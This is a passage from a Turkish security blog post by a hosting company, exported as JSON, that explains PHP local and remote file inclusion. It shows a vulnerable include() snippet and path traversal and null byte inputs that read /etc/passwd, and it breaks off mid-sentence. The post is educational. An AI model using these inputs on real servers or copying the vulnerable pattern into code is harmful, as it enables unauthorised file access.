{"id":15629,"date":"2026-04-29T17:40:13","date_gmt":"2026-04-29T14:40:13","guid":{"rendered":"https:\/\/www.ihs.com.tr\/blog\/?p=15629"},"modified":"2026-04-29T17:40:13","modified_gmt":"2026-04-29T14:40:13","slug":"lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir","status":"publish","type":"post","link":"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/","title":{"rendered":"LFI (Yerel) ve RFI (Uzak) Dosya Ekleme Nedir? PHP A\u00e7\u0131klar\u0131 \u00dczerinden Dosyalar Nas\u0131l Okunur?"},"content":{"rendered":"<p>Web uygulamalar\u0131, kullan\u0131c\u0131 deneyimini zenginle\u015ftirmek ve dinamik i\u00e7erik sunmak i\u00e7in \u00e7e\u015fitli sunucu tarafl\u0131 i\u015flevselliklere sahiptir. Bu i\u015flevselliklerden biri de dosya ekleme (File Inclusion) \u00f6zelli\u011fidir. Temelde, bir beti\u011fin i\u00e7erisine ba\u015fka bir dosyan\u0131n i\u00e7eri\u011fini dahil etme mant\u0131\u011f\u0131na dayanan bu yap\u0131, kod tekrar\u0131n\u0131 \u00f6nlemek ve mod\u00fcler bir geli\u015ftirme ortam\u0131 sa\u011flamak i\u00e7in olduk\u00e7a kullan\u0131\u015fl\u0131d\u0131r. Ancak, geli\u015ftirme a\u015famas\u0131nda yap\u0131lan hatalar ve al\u0131nan g\u00fcvenlik \u00f6nlemlerinin yetersizli\u011fi, bu kullan\u0131\u015fl\u0131 \u00f6zelli\u011fi siber sald\u0131rganlar i\u00e7in g\u00fc\u00e7l\u00fc bir silaha d\u00f6n\u00fc\u015ft\u00fcrebilir. Dosya ekleme zafiyetleri, sald\u0131rganlar\u0131n sunucudaki yetkisiz dosyalara eri\u015fmesine, hassas verileri s\u0131zd\u0131rmas\u0131na ve hatta sunucu \u00fczerinde tam kontrol elde etmesine olanak tan\u0131yan kritik g\u00fcvenlik a\u00e7\u0131klar\u0131d\u0131r.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_77 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u0130\u00e7erik Tablosu<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69f242f6838d7\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\" id=\"ez-toc-cssicon-toggle-item-69f242f6838d7\" aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Dosya-Ekleme-File-Inclusion-Aciklarina-Genel-Bakis\" >Dosya Ekleme (File Inclusion) A\u00e7\u0131klar\u0131na Genel Bak\u0131\u015f<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Web-Uygulamalarinda-Dosya-Ekleme-Islevselligi\" >Web Uygulamalar\u0131nda Dosya Ekleme \u0130\u015flevselli\u011fi<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Dosya-Ekleme-Zafiyeti-Nedir-ve-Nasil-Olusur\" >Dosya Ekleme Zafiyeti Nedir ve Nas\u0131l Olu\u015fur?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#LFI-ve-RFI-Arasindaki-Temel-Farklar\" >LFI ve RFI Aras\u0131ndaki Temel Farklar<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Yerel-Dosya-Ekleme-LFI-%E2%80%93-Local-File-Inclusion-Zafiyeti\" >Yerel Dosya Ekleme (LFI &#8211; Local File Inclusion) Zafiyeti<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#LFI-Zafiyeti-Nedir\" >LFI Zafiyeti Nedir?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#PHPde-LFI-Zafiyetine-Neden-Olan-Kodlama-Hatalari\" >PHP&#8217;de LFI Zafiyetine Neden Olan Kodlama Hatalar\u0131<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Temel-LFI-Saldiri-Teknikleri\" >Temel LFI Sald\u0131r\u0131 Teknikleri<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#LFI-ile-Sistem-Dosyalarini-Okuma-Ornekleri\" >LFI ile Sistem Dosyalar\u0131n\u0131 Okuma \u00d6rnekleri<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Uzak-Dosya-Ekleme-RFI-%E2%80%93-Remote-File-Inclusion-Zafiyeti\" >Uzak Dosya Ekleme (RFI &#8211; Remote File Inclusion) Zafiyeti<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#RFI-Zafiyeti-Nedir\" >RFI Zafiyeti Nedir?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#RFI-Zafiyetinin-Ortaya-Cikma-Kosullari-phpini-Yapilandirmasi\" >RFI Zafiyetinin Ortaya \u00c7\u0131kma Ko\u015fullar\u0131: `php.ini` Yap\u0131land\u0131rmas\u0131<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#RFI-Saldirisi-Nasil-Gerceklestirilir\" >RFI Sald\u0131r\u0131s\u0131 Nas\u0131l Ger\u00e7ekle\u015ftirilir?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#RFInin-Yikici-Etkileri-Uzaktan-Kod-Calistirma-RCE-Riski\" >RFI&#8217;nin Y\u0131k\u0131c\u0131 Etkileri: Uzaktan Kod \u00c7al\u0131\u015ft\u0131rma (RCE) Riski<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#PHP-Wrapperlari-Kullanarak-Gelismis-Dosya-Okuma-ve-Kod-Calistirma-Teknikleri\" >PHP Wrapper&#8217;lar\u0131 Kullanarak Geli\u015fmi\u015f Dosya Okuma ve Kod \u00c7al\u0131\u015ft\u0131rma Teknikleri<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#PHP-Wrapper-Nedir-ve-Saldirilarda-Nasil-Kotuye-Kullanilir\" >PHP Wrapper Nedir ve Sald\u0131r\u0131larda Nas\u0131l K\u00f6t\u00fcye Kullan\u0131l\u0131r?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#php-filter-Wrapperi-ile-Dosya-Kaynak-Kodunu-Goruntuleme\" >`php:\/\/filter` Wrapper&#8217;\u0131 ile Dosya Kaynak Kodunu G\u00f6r\u00fcnt\u00fcleme<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#data-Wrapperi-ile-Kod-Enjeksiyonu\" >`data:\/\/` Wrapper&#8217;\u0131 ile Kod Enjeksiyonu<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#expect-Wrapperi-ile-Komut-Calistirma\" >`expect:\/\/` Wrapper&#8217;\u0131 ile Komut \u00c7al\u0131\u015ft\u0131rma<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#zip-ve-phar-Wrapperlari-ile-Arsivlenmis-Dosyalara-Erisim\" >`zip:\/\/` ve `phar:\/\/` Wrapper&#8217;lar\u0131 ile Ar\u015fivlenmi\u015f Dosyalara Eri\u015fim<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Dosya-Ekleme-Zafiyetlerini-Tespit-Etme-ve-Onleme-Yontemleri\" >Dosya Ekleme Zafiyetlerini Tespit Etme ve \u00d6nleme Y\u00f6ntemleri<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Manuel-Kod-Analizi-ile-Zafiyet-Tespiti\" >Manuel Kod Analizi ile Zafiyet Tespiti<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Otomatik-Zafiyet-Tarama-Araclarinin-Kullanimi\" >Otomatik Zafiyet Tarama Ara\u00e7lar\u0131n\u0131n Kullan\u0131m\u0131<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Guvenli-Kodlama-Prensipleri-ve-En-Iyi-Uygulamalar\" >G\u00fcvenli Kodlama Prensipleri ve En \u0130yi Uygulamalar<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Sunucu-ve-PHP-Yapilandirmasini-Guvenlilestirme\" >Sunucu ve PHP Yap\u0131land\u0131rmas\u0131n\u0131 G\u00fcvenlile\u015ftirme<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Web-Uygulama-Guvenliginiz-Icin-Neden-IHS-Telekomu-Tercih-Etmelisiniz\" >Web Uygulama G\u00fcvenli\u011finiz \u0130\u00e7in Neden \u0130HS Telekom&#8217;u Tercih Etmelisiniz?<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Guvenli-Barindirma-Altyapisi-ve-Zafiyet-Korumasi\" >G\u00fcvenli Bar\u0131nd\u0131rma Altyap\u0131s\u0131 ve Zafiyet Korumas\u0131<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Web-Application-Firewall-WAF-Hizmetleri-ile-Proaktif-Koruma\" >Web Application Firewall (WAF) Hizmetleri ile Proaktif Koruma<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Duzenli-Guvenlik-Taramalari-ve-Detayli-Raporlama\" >D\u00fczenli G\u00fcvenlik Taramalar\u0131 ve Detayl\u0131 Raporlama<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-30\" href=\"https:\/\/www.ihs.com.tr\/blog\/lfi-yerel-ve-rfi-uzak-dosya-ekleme-nedir\/#Olasi-Saldirilara-Karsi-724-Uzman-Teknik-Destek\" >Olas\u0131 Sald\u0131r\u0131lara Kar\u015f\u0131 7\/24 Uzman Teknik Destek<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"Dosya-Ekleme-File-Inclusion-Aciklarina-Genel-Bakis\"><\/span>Dosya Ekleme (File Inclusion) A\u00e7\u0131klar\u0131na Genel Bak\u0131\u015f<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Web uygulamalar\u0131n\u0131n temel yap\u0131 ta\u015flar\u0131ndan olan dosya ekleme mekanizmalar\u0131, do\u011fru yap\u0131land\u0131r\u0131lmad\u0131\u011f\u0131nda ciddi g\u00fcvenlik riskleri do\u011furur. Bu b\u00f6l\u00fcmde, dosya ekleme i\u015flevselli\u011finin ne oldu\u011funu, bu i\u015flevselli\u011fin nas\u0131l bir zafiyete d\u00f6n\u00fc\u015ft\u00fc\u011f\u00fcn\u00fc ve en yayg\u0131n iki t\u00fcr\u00fc olan LFI ve RFI&#8217;nin temel farklar\u0131n\u0131 ele alaca\u011f\u0131z.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Web-Uygulamalarinda-Dosya-Ekleme-Islevselligi\"><\/span>Web Uygulamalar\u0131nda Dosya Ekleme \u0130\u015flevselli\u011fi<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Modern web geli\u015ftirmede, bir web sayfas\u0131n\u0131 olu\u015fturan t\u00fcm kodlar\u0131 tek bir dosyada tutmak yerine, kodlar mant\u0131ksal par\u00e7alara b\u00f6l\u00fcn\u00fcr. \u00d6rne\u011fin, bir sitenin \u00fcst bilgi (header), alt bilgi (footer) ve men\u00fc gibi k\u0131s\u0131mlar\u0131 ayr\u0131 dosyalarda saklan\u0131r. Ana sayfa beti\u011fi \u00e7al\u0131\u015ft\u0131\u011f\u0131nda, PHP gibi sunucu tarafl\u0131 dillerin `include()`, `require()`, `include_once()` veya `require_once()` gibi fonksiyonlar\u0131 kullan\u0131larak bu par\u00e7alar ana beti\u011fe dahil edilir. Bu yakla\u015f\u0131m, kodun daha y\u00f6netilebilir, okunabilir ve s\u00fcrd\u00fcr\u00fclebilir olmas\u0131n\u0131 sa\u011flar. Ayn\u0131 zamanda, birden fazla sayfada kullan\u0131lacak ortak bir veritaban\u0131 ba\u011flant\u0131 dosyas\u0131n\u0131 veya fonksiyon k\u00fct\u00fcphanesini her seferinde yeniden yazmak yerine tek bir yerden \u00e7a\u011f\u0131rma imkan\u0131 sunar.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Dosya-Ekleme-Zafiyeti-Nedir-ve-Nasil-Olusur\"><\/span>Dosya Ekleme Zafiyeti Nedir ve Nas\u0131l Olu\u015fur?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Dosya ekleme zafiyeti (File Inclusion Vulnerability), bir uygulaman\u0131n, dahil edilecek dosyan\u0131n yolunu veya ad\u0131n\u0131 kullan\u0131c\u0131dan gelen bir girdi ile dinamik olarak belirlemesi ve bu girdiyi yeterince do\u011frulamamas\u0131 veya temizlememesi (sanitization) durumunda ortaya \u00e7\u0131kar. \u00d6rne\u011fin, bir web sitesi farkl\u0131 sayfalar\u0131 g\u00f6stermek i\u00e7in URL&#8217;de bir parametre kullanabilir: `index.php?sayfa=hakkimizda.php`. Burada `sayfa` parametresi, sunucunun hangi dosyay\u0131 ekleyece\u011fini belirler. E\u011fer uygulama, bu parametreye yaz\u0131lan de\u011feri kontrol etmeden do\u011frudan dosya ekleme fonksiyonuna g\u00f6nderirse, bir sald\u0131rgan bu parametreyi manip\u00fcle ederek ama\u00e7lanan\u0131n d\u0131\u015f\u0131nda dosyalar\u0131 da sisteme dahil ettirebilir. Bu durum, sunucudaki hassas bilgilerin okunmas\u0131ndan uzaktan kod \u00e7al\u0131\u015ft\u0131rmaya kadar varan ciddi sonu\u00e7lara yol a\u00e7abilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"LFI-ve-RFI-Arasindaki-Temel-Farklar\"><\/span>LFI ve RFI Aras\u0131ndaki Temel Farklar<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Dosya ekleme zafiyetleri, eklenmek istenen dosyan\u0131n konumuna g\u00f6re iki ana kategoriye ayr\u0131l\u0131r: Yerel Dosya Ekleme (Local File Inclusion &#8211; LFI) ve Uzak Dosya Ekleme (Remote File Inclusion &#8211; RFI). Bu iki zafiyet t\u00fcr\u00fc aras\u0131ndaki temel fark, sald\u0131rgan\u0131n hedef ald\u0131\u011f\u0131 dosyan\u0131n kayna\u011f\u0131d\u0131r.<\/p>\n<div class=\"karsilastirma\">\n<table>\n<thead>\n<tr>\n<th>\u00d6zellik<\/th>\n<th>LFI (Local File Inclusion)<\/th>\n<th>RFI (Remote File Inclusion)<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><b>Dosya Kayna\u011f\u0131<\/b><\/td>\n<td>Sald\u0131rgan, hedef sunucuda zaten var olan yerel bir dosyay\u0131 hedefler.<\/td>\n<td>Sald\u0131rgan, kendi kontrol\u00fcndeki uzak bir sunucuda bulunan bir dosyay\u0131 hedefler.<\/td>\n<\/tr>\n<tr>\n<td><b>Temel Ama\u00e7<\/b><\/td>\n<td>Sistem dosyalar\u0131n\u0131 okumak, hassas bilgileri (\u015fifreler, konfig\u00fcrasyonlar) s\u0131zd\u0131rmak.<\/td>\n<td>Uzak sunucudaki zararl\u0131 kodu hedef sunucuda \u00e7al\u0131\u015ft\u0131rmak (Remote Code Execution &#8211; RCE).<\/td>\n<\/tr>\n<tr>\n<td><b>Gereken Ko\u015ful<\/b><\/td>\n<td>Kullan\u0131c\u0131 girdisinin dosya yolu olarak i\u015flenmesi ve filtrelenmemesi yeterlidir.<\/td>\n<td>PHP ayarlar\u0131nda `allow_url_include` direktifinin `On` olarak ayarlanm\u0131\u015f olmas\u0131 gerekir.<\/td>\n<\/tr>\n<tr>\n<td><b>Etki D\u00fczeyi<\/b><\/td>\n<td>Genellikle bilgi s\u0131zd\u0131rma ile s\u0131n\u0131rl\u0131d\u0131r, ancak log zehirleme gibi tekniklerle RCE&#8217;ye d\u00f6n\u00fc\u015febilir.<\/td>\n<td>Do\u011frudan uzaktan kod \u00e7al\u0131\u015ft\u0131rmaya (RCE) ve sunucunun tamamen ele ge\u00e7irilmesine yol a\u00e7ar.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2><span class=\"ez-toc-section\" id=\"Yerel-Dosya-Ekleme-LFI-%E2%80%93-Local-File-Inclusion-Zafiyeti\"><\/span>Yerel Dosya Ekleme (LFI &#8211; Local File Inclusion) Zafiyeti<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>LFI, sald\u0131rganlar\u0131n ayn\u0131 sunucu \u00fczerinde bulunan dosyalara yetkisiz eri\u015fim sa\u011flamas\u0131na olanak tan\u0131yan kritik bir g\u00fcvenlik a\u00e7\u0131\u011f\u0131d\u0131r. Genellikle bilgi s\u0131zd\u0131rma amac\u0131yla kullan\u0131lsa da, belirli ko\u015fullar alt\u0131nda \u00e7ok daha tehlikeli sald\u0131r\u0131lara zemin haz\u0131rlayabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"LFI-Zafiyeti-Nedir\"><\/span>LFI Zafiyeti Nedir?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>LFI zafiyeti, web uygulamas\u0131n\u0131n kullan\u0131c\u0131dan ald\u0131\u011f\u0131 bir girdiyi (genellikle bir dosya ad\u0131 veya yolu) yetersiz bir \u015fekilde do\u011frulayarak, sunucudaki yerel dosya sisteminden bir dosyay\u0131 okumak veya \u00e7al\u0131\u015ft\u0131rmak i\u00e7in kullanmas\u0131 durumunda meydana gelir. Sald\u0131rgan, bu zafiyeti kullanarak uygulama kodunun eri\u015fim yetkisi dahilindeki herhangi bir dosyay\u0131 okuyabilir. Bu, sistem parolalar\u0131n\u0131, veritaban\u0131 kimlik bilgilerini, uygulama kaynak kodlar\u0131n\u0131 ve di\u011fer hassas verileri i\u00e7erebilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"PHPde-LFI-Zafiyetine-Neden-Olan-Kodlama-Hatalari\"><\/span>PHP&#8217;de LFI Zafiyetine Neden Olan Kodlama Hatalar\u0131<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>PHP&#8217;de LFI zafiyetinin en yayg\u0131n nedeni, geli\u015ftiricilerin kullan\u0131c\u0131dan gelen veriyi do\u011frudan `include()` veya `require()` gibi dosya ekleme fonksiyonlar\u0131na parametre olarak vermesidir. A\u015fa\u011f\u0131da tipik bir zafiyetli kod par\u00e7as\u0131 \u00f6rne\u011fi verilmi\u015ftir:<\/p>\n<p><code>&lt;?php<br \/>$sayfa = $_GET['sayfa'];<br \/>include($sayfa . '.php');<br \/>?&gt;<\/code><\/p>\n<p>Bu kodda, URL \u00fczerinden gelen `sayfa` parametresinin de\u011feri al\u0131narak sonuna `.php` uzant\u0131s\u0131 eklenip `include` fonksiyonuna veriliyor. \u0130lk bak\u0131\u015fta sadece `.php` uzant\u0131l\u0131 dosyalar\u0131n eklenebilece\u011fi d\u00fc\u015f\u00fcn\u00fclse de, sald\u0131rganlar bu korumay\u0131 \u00e7e\u015fitli tekniklerle a\u015fabilirler.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Temel-LFI-Saldiri-Teknikleri\"><\/span>Temel LFI Sald\u0131r\u0131 Teknikleri<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Sald\u0131rganlar, LFI zafiyetlerini s\u00f6m\u00fcrmek i\u00e7in \u00e7e\u015fitli y\u00f6ntemler kullan\u0131r. En yayg\u0131n olanlar\u0131 Dizin Ge\u00e7i\u015fi ve Null Byte Enjeksiyonu&#8217;dur.<\/p>\n<h4>Dizin Ge\u00e7i\u015fi (Path Traversal) Sald\u0131r\u0131lar\u0131<\/h4>\n<p>Dizin Ge\u00e7i\u015fi (veya &#8220;dot-dot-slash&#8221;) sald\u0131r\u0131s\u0131, sald\u0131rgan\u0131n uygulama taraf\u0131ndan hedeflenen dizinin d\u0131\u015f\u0131na \u00e7\u0131karak dosya sisteminin di\u011fer b\u00f6lgelerine eri\u015fmesini sa\u011flar. `..\/` karakter dizisi, dosya sisteminde bir \u00fcst dizine \u00e7\u0131kmay\u0131 ifade eder. Yukar\u0131daki zafiyetli kod \u00f6rne\u011fi i\u00e7in bir sald\u0131rgan, URL&#8217;yi \u015fu \u015fekilde manip\u00fcle edebilir:<\/p>\n<p><code>index.php?sayfa=..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<p>Sunucu bu iste\u011fi i\u015fledi\u011finde, `include` fonksiyonu `..\/..\/..\/..\/etc\/passwd.php` dosyas\u0131n\u0131 eklemeye \u00e7al\u0131\u015f\u0131r. Ancak, `\/etc\/passwd` dosyas\u0131n\u0131n bir uzant\u0131s\u0131 olmad\u0131\u011f\u0131 i\u00e7in bu sald\u0131r\u0131 genellikle ba\u015far\u0131s\u0131z olur. Fakat bu t\u00fcr k\u0131s\u0131tlamalar\u0131 a\u015fman\u0131n da yollar\u0131 vard\u0131r.<\/p>\n<h4>Null Byte Enjeksiyonu Tekni\u011fi<\/h4>\n<p>Null byte enjeksiyonu (`%00`), PHP&#8217;nin eski s\u00fcr\u00fcmlerinde (5.3.4 \u00f6ncesi) etkili olan bir tekniktir. C tabanl\u0131 dillerde null byte, bir string&#8217;in (karakter dizisinin) sonunu i\u015faret eder. Sald\u0131rgan, Dizin Ge\u00e7i\u015fi sald\u0131r\u0131s\u0131n\u0131 bu teknikle birle\u015ftirerek kodun sonuna eklenen `.php` uzant\u0131s\u0131n\u0131 etkisiz hale getirebilir:<\/p>\n<p><code>index.php?sayfa=..\/..\/..\/..\/etc\/passwd%00<\/code><\/p>\n<p>PHP yorumlay\u0131c\u0131s\u0131, `..\/..\/..\/..\/etc\/passwd%00.php` ifadesini g\u00f6rd\u00fc\u011f\u00fcnde, null byte karakterinden sonras\u0131n\u0131 yok sayar ve `..\/..\/..\/..\/etc\/passwd` dosyas\u0131n\u0131 oldu\u011fu gibi i\u015flemeye \u00e7al\u0131\u015f\u0131r. Bu da dosya i\u00e7eri\u011finin ekrana bas\u0131lmas\u0131na neden olur. G\u00fcncel PHP s\u00fcr\u00fcmlerinde bu a\u00e7\u0131k kapat\u0131lm\u0131\u015f olsa da, eski sistemlerde hala bir risk olu\u015fturmaktad\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"LFI-ile-Sistem-Dosyalarini-Okuma-Ornekleri\"><\/span>LFI ile Sistem Dosyalar\u0131n\u0131 Okuma \u00d6rnekleri<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>LFI zafiyeti ba\u015far\u0131yla s\u00f6m\u00fcr\u00fcld\u00fc\u011f\u00fcnde, sald\u0131rganlar sistem hakk\u0131nda de\u011ferli bilgiler i\u00e7eren kritik dosyalara eri\u015febilirler.<\/p>\n<h4>Linux Sistemlerde `\/etc\/passwd` Dosyas\u0131n\u0131 Okuma<\/h4>\n<p>Linux tabanl\u0131 sistemlerde `\/etc\/passwd` dosyas\u0131, sistemdeki kullan\u0131c\u0131lar\u0131n listesini i\u00e7erir. Bu dosyan\u0131n okunmas\u0131, sald\u0131rgana sistemde hangi kullan\u0131c\u0131 hesaplar\u0131n\u0131n oldu\u011funu g\u00f6sterir ve bu bilgiyi daha ileri sald\u0131r\u0131lar i\u00e7in bir ba\u015flang\u0131\u00e7 noktas\u0131 olarak kullanmas\u0131na olanak tan\u0131r. \u015eifrelerin kendisi bu dosyada olmasa da (genellikle `\/etc\/shadow` dosyas\u0131ndad\u0131r ve bu dosyaya eri\u015fim daha k\u0131s\u0131tl\u0131d\u0131r), kullan\u0131c\u0131 adlar\u0131n\u0131 \u00f6\u011frenmek bile \u00f6nemli bir 